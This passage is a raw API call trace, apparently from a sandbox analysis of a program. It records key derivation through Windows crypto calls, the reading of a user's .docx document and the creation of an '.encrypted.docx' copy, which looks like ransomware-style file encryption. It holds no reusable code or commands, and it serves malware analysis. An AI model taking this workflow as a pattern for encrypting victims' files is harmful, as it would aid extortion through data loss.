returned 0x10 [0036.896] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.896] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.896] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.897] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.897] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0036.897] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0036.897] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.897] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.897] CryptHashData (hHash=0x7c2100, pbData=0x7c9758, dwDataLen=0x100, dwFlags=0x1) returned 1 [0036.897] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.897] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.897] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.897] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0036.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0036.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0036.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0036.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0036.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0036.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0036.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0036.897] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.897] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0036.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0036.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0036.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0036.898] CryptDestroyHash (hHash=0x7c2100) returned 1 [0036.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0036.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0036.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0036.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0036.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0036.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0036.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0036.898] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xtfgsi8s58kpp1ffy.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0036.898] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.898] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0036.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0036.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0036.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0036.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0036.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0036.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0036.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0036.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0036.898] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.encrypted.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xtfgsi8s58kpp1ffy.encrypted.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0036.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0036.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0036.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0036.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0036.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0036.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0036.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0036.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0036.899] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0036.899] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x793e, lpOverlapped=0x0) returned 1 [0036.901] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0036.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0036.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0036.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x793e) returned 0xac0018 [0036.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0036.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0036.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0036.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0036.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0036.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0036.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x793e) returned 0xac7960 [0036.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0036.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.904] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0036.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0036.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0036.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0036.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x793e) returned 0xac0018 [0036.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0036.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0036.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0036.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.904] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0036.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0036.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0036.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0036.905] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0036.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0036.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.905] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0036.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0036.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0036.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0036.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0036.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0036.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0036.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x793e) returned 0xac0018 [0036.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0036.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0036.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0036.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0036.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1a8 [0036.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0036.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0036.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0036.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2e8 [0036.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0036.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0036.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0036.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb08 [0036.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0036.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0036.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0036.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0036.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0036.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x793e) returned 0xacf2a8 [0036.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0036.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0036.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0036.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0036.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0036.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0036.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0036.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0036.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0036.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0036.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0036.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0036.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0036.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0036.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0036.907] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0036.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0036.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0036.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0036.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0036.907] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0036.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0036.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0036.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0036.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0036.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0036.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0036.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0036.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0036.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0036.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0036.907] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0036.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0036.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0036.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2d8 [0036.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0036.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0036.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0036.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0036.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca00 [0036.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0036.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0036.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0036.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0036.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0036.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0036.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0036.908] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0036.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0036.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0036.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0036.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0036.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0036.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0036.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0036.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0036.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0036.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0036.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0036.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0036.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0036.908] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0036.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0036.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0036.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0036.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0036.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0036.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0036.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0036.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0036.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0036.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0036.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0036.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0036.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0036.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0036.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0036.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0036.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0036.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0036.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0036.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0036.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0036.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0036.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0036.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.909] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0036.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0036.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0036.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0036.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0036.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0036.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0036.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0036.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0036.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0036.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0036.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0036.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0036.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0036.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0036.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0036.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0036.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 